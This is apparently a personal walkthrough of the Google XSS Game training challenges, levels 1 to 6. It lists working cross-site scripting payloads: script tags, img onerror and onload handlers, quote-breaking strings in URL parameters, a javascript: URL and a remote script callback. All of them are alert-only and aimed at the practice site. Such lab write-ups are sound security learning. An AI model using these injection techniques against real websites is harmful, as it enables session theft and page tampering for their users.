- Google XSS Challenges at https://xss-game.appspot.com
- Help : https://www.google.com/about/appsecurity/learning/xss/index.html
The output will be directly displayed without any escaping.
A simple query with <script>alert("XSS")</script> will do the job.
script blocks are not allowed.
Post content : <img src='aaaaaaa' onerror=alert("XSS")>
Make sure that aaaaaaa is not a valid image.
The only thing we can do is to use the URL for the attack vector.
A few tests later, we understand that the section after the '#' is placed
in a img block. Same JS trick as Level 2.
URL : https://xss-game.appspot.com/level3/frame#1' onerror='alert("XSS")
Other solutions:
https://xss-game.appspot.com/level3/frame#1'><script>alert("XSS")</script>
https://xss-game.appspot.com/level3/frame#1.jpg' onload=alert("XSS")>
The input will be displayed but will be escaped.
Otherwise, the input is also used in the img section which displays the loading animation
Query : 1";alert("XSS
URL : https://xss-game.appspot.com/level4/frame?timer=1';alert('XSS
The next field in the URL represents the name of the function call on submit.
Just put javascript:alert("XSS") into next value.
URL : https://xss-game.appspot.com/level5/frame/signup?next=javascript%3Aalert%28%27XSS%27%29
(forth hint really useful)
Here we can't insert code but we can ask to load a library from Google JSAPI for instance.
URl : https://xss-game.appspot.com/level6/frame#//google.com/jsapi?callback=alert
If we try with a complete URL such as htt://google.com/jsapi?callback=alert, strange things appended. I'm sure there might be a way without any API but I didn't find it yet.
cool